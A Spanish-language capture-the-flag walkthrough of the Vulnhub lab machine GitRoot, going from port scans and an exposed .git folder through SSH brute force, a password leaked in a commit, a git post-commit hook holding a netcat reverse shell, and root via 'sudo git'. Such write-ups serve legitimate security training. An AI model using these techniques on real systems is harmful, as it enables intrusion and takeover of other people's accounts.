[VLN] GitRoot

Hoy vamos a hackear la maquina de Vulnhub llamada GitRoot:1. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/gitroot-1,488/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.45 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 22:39 CEST Nmap scan report for GitRoot.home (192.168.1.45) Host is up (0.0025s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 bf:45:f6:b3:e3:ce:0c:69:18:5a:5b:27:e5:d3:9c:86 (RSA) | 256 b5:d7:45:50:06:c4:e2:3c:28:52:b8:06:26:1f:de:b0 (ECDSA) |_ 256 27:f0:d0:21:13:30:9c:5e:f0:70:a1:d8:5c:a7:8f:75 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Hey Jen 11211/tcp open memcache? | fingerprint-strings: | RPCCheck: |_ Unknown command 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port11211-TCP:V=7.80%I=7%D=6/5%Time=5EDAADBC%P=x86_64-pc-linux-gnu%r(RP SF:CCheck,27,"\x81\0\0\0\0\0\0\x81\0\0\0\x0f\0\0\0\x02\0\0\0\0\0\0\0\0Unkn SF:own\x20command"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 93.69 seconds
    Echamos un vistazo a la web http://192.168.1.45/ y vemos: Hey Jen, just installed wordpress over at wp.gitroot.vuln please go check it out! Asi que agregamos wp.gitroot.vuln a /etc/hosts. Ya que estamos, agregamos tambien: gitroot.vuln Escaneamos para ver si encontramos mas subdominios.
    sml@Cassandra:~$ gobuster vhost -u gitroot.vuln -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://gitroot.vuln [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/06/05 22:42:29 Starting gobuster =============================================================== Found: repo.gitroot.vuln (Status: 200) [Size: 438] Found: wp.gitroot.vuln (Status: 200) [Size: 10697] =============================================================== 2020/06/05 22:43:10 Finished ===============================================================
    Encontramos repo.gitroot.vuln asi que lo agregamos tambien al fichero /etc/hosts. Echamos un vistazo a ver si encontramos algo interesante en este nuevo subdominio.
    sml@Cassandra:~$ gobuster dir -u repo.gitroot.vuln -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://repo.gitroot.vuln [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/06/07 23:21:35 Starting gobuster =============================================================== /.git/HEAD (Status: 200) /.htpasswd (Status: 403) /.hta (Status: 403) /.htaccess (Status: 403) /index.php (Status: 200) /javascript (Status: 301) /manual (Status: 301) /server-status (Status: 403) =============================================================== 2020/06/07 23:21:39 Finished ===============================================================
    Vemos que existe el directorio /.git. Los .git suelen tener siempre la misma estructura de ficheros, sabiendo esto visitamos http://repo.gitroot.vuln/.git/index y lo descargamos. Miramos si nos puede interesar algo...
    sml@Cassandra:~/Descargas$ strings index DIRC D33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt GkL^ get.php index.php 3K*P'cg pablo_HELP.txt v;T&w^ set.php GkL^ stats.php TREE
    Existe el fichero pablo_HELP.txt, hacemos bruteforce al usuario pablo.
    sml@Cassandra:~$ hydra -l pablo -P FU.txt 192.168.1.140 ssh -I Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-08 12:18:32 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task [DATA] attacking ssh://192.168.1.140:22/ [22][ssh] host: 192.168.1.140 login: pablo password: mastergitar 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-08 12:18:33
  • Low Shell
  • Nos conectamos por ssh como "pablo" y la password que hemos obtenido "mastergitar" :)
    sml@Cassandra:~/$ ssh pablo@192.168.1.180 pablo@GitRoot:~$ ls public user.txt pablo@GitRoot:~$ cat user.txt _______ _ _ _____ _ _ |__ __| | | | | __ \ | | | | | | | |__ __ _ _ __ | | __ _ _ ___ _ _ | |__) |_ _| |__ | | ___ | | | '_ \ / _` | '_ \| |/ / | | | |/ _ \| | | | | ___/ _` | '_ \| |/ _ \ | | | | | | (_| | | | | < | |_| | (_) | |_| | | | | (_| | |_) | | (_) |_| |_| |_|\__,_|_| |_|_|\_\ \__, |\___/ \__,_| |_| \__,_|_.__/|_|\___/ __/ | |___/ Great job! Do not falter, there is more to do. You made it this far, finish the race! "It's not that I'm so smart. Its just that I stay with problems longer." - Albert Einstein 8a81007ea736a2b8a72a624672c375f9ac707b5e
    Exploramos un poco mas...
    pablo@GitRoot:~$ cd public pablo@GitRoot:~/public$ ls -l total 4 -rw-r--r-- 1 beth beth 58 May 25 23:08 message.txt pablo@GitRoot:~/public$ cat message.txt Hey pablo Make sure to check-out our brand new git repo!
    Vemos que "beth" nos deja un mensaje donde indica que revisemos el nuevo repositorio git. Lo buscamos.
    pablo@GitRoot:~/public$ find / -name .git 2>/dev/null /opt/auth/.git /var/www/repo/.git
    El nuevo repositorio del que habla es: /opt/auth/.git Echamos un vistazo para ver todos los cambios que se han ido realizando y demas.
    pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ cat * ----SNIP---- 0000000000000000000000000000000000000000 fc9901f3b6b303d6ad40cdb71689f1646904f7b3 Your Name 1590499965 -0400 branch: Created from HEAD fc9901f3b6b303d6ad40cdb71689f1646904f7b3 b2ab5f540baab4c299306e16f077d7a6f6556ca3 Your Name 1590500014 -0400 commit: init repo b2ab5f540baab4c299306e16f077d7a6f6556ca3 06fbefc1da56b8d552cfa299924097ba1213dd93 Your Name 1590500148 -0400 commit: added some stuff ----SNIP---- pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ git show 06fbefc1da56b8d552cfa299924097ba1213dd93 commit 06fbefc1da56b8d552cfa299924097ba1213dd93 Author: Your Name Date: Tue May 26 09:35:48 2020 -0400 added some stuff diff --git a/main.c b/main.c index 70e6397..8af9b9c 100644 --- a/main.c +++ b/main.c @@ -4,6 +4,15 @@ int main(){ char pass[20]; - return 0; + scanf("%20s", pass); + printf("You put %s\n", pass); + if (strcmp(pass, "r3vpdmspqdb") == 0 ){ + char *cmd[] = { "bash", (char *)0 }; + execve("/bin/bash", cmd, (char *) 0); + } + else{ + puts("BAD PASSWORD"); + } + return 0; } -//43 +
    Vemos que en un commit, aparece la que podria ser la password de beth. Probamos :)
    pablo@GitRoot:/tmp/j$ su beth Password: r3vpdmspqdb beth@GitRoot:~$ id uid=1001(beth) gid=1001(beth) groups=1001(beth)
    Ahora que tenemos los privilegios de beth, exploramos un poco.
    beth@GitRoot:~$ cd ~ beth@GitRoot:~$ cd public beth@GitRoot:~/public$ ls -l total 4 -rw-r--r-- 1 jen jen 151 May 26 00:29 addToMyRepo.txt beth@GitRoot:~/public$ cat addToMyRepo.txt Hello Beth If you want to commit to my repository you can add a zip file to ~jen/public/repos/ and ill unzip it and add it to my repository Thanks!
    En este caso parece que "jen" quiere que le dejemos un fichero zip en la carpeta que nos indica, y ella lo descomprimira y agregara a su repositorio. Vamos a jugar con los "hooks" y crear el post-commit, para asi despues de que jen haga el commit se ejecute. En nuestro caso crearemos una reverse shell.
    beth@GitRoot:~/public$ cd /tmp beth@GitRoot:~/tmp$ mkdir -p .git/hooks beth@GitRoot:~/tmp$ cd .git/hooks beth@GitRoot:~/tmp/.git/hooks$ nano post-commit
    Y dentro del fichero post-commit ponemos:
    #!/bin/sh /usr/bin/nc -e /bin/bash 192.168.1.148 5555
    Le damos los permisos, comprimimos y lo ponemos donde jen necesita.
    beth@GitRoot:~/tmp/.git/hooks$ chmod 777 post-commit beth@GitRoot:~/tmp/.git/hooks$ chmod +x post-commit beth@GitRoot:~/tmp/.git/hooks$ cd /tmp beth@GitRoot:~/tmp$ 7z a yo.zip .git/ beth@GitRoot:~/tmp$ chmod 777 yo.zip beth@GitRoot:~/tmp$ cp yo.zip /home/jen/public/repos
    Ponemos nuestro nc a la escucha en nuestra maquina.
    sml@Cassandra:~$ nc -nlvp 5555
    Al rato....
    sml@Cassandra:~$ nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.80] 52104 python -c 'import pty; pty.spawn("/bin/bash")' $ id uid=1003(jen) gid=1003(jen) groups=1003(jen)
    Ahora que estamos como "jen" exploramos un poco el sistema. Vemos que tiene el fichero ~/.viminfo que contiene informacion que podria ser su password...
    jen@GitRoot:~$ cd ~ jen@GitRoot:~$ cat .viminfo ---SNIP--- # This viminfo file was generated by Vim 8.1. # Search String History (newest to oldest): ?/binzpbeocnexoe |2,1,1590471908,47,"binzpbeocnexoe" # Expression History (newest to oldest): # Input Line History (newest to oldest): # Debug Line History (newest to oldest): # Registers: # File marks: ---SNIP----
    Vamos a ver que podemos realizar con sudo, y usando la posible password que tiene en el fichero .viminfo.
  • Privilege Escalation
  • jen@GitRoot:~$ sudo -l [sudo] password for jen: binzpbeocnexoe Matching Defaults entries for jen on GitRoot: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User jen may run the following commands on GitRoot: (ALL) /usr/bin/git
    Parece que funciona :) Bien, podemos usar "sudo git", el cual nos sirve para escalar privilegios. Asi que...
    sudo git -p help config !/bin/sh #cd /root # ls passwords POC root.txt setpasswords.php # cat root.txt Thank you for completing my box! Please let my know what you liked and what you didn't like at my twitter @Recursive_NULL 734ae32be131cd0681f86c03858f4f587a3c69ce
  • End
  • Y con esto ya seriamos root de la maquina :)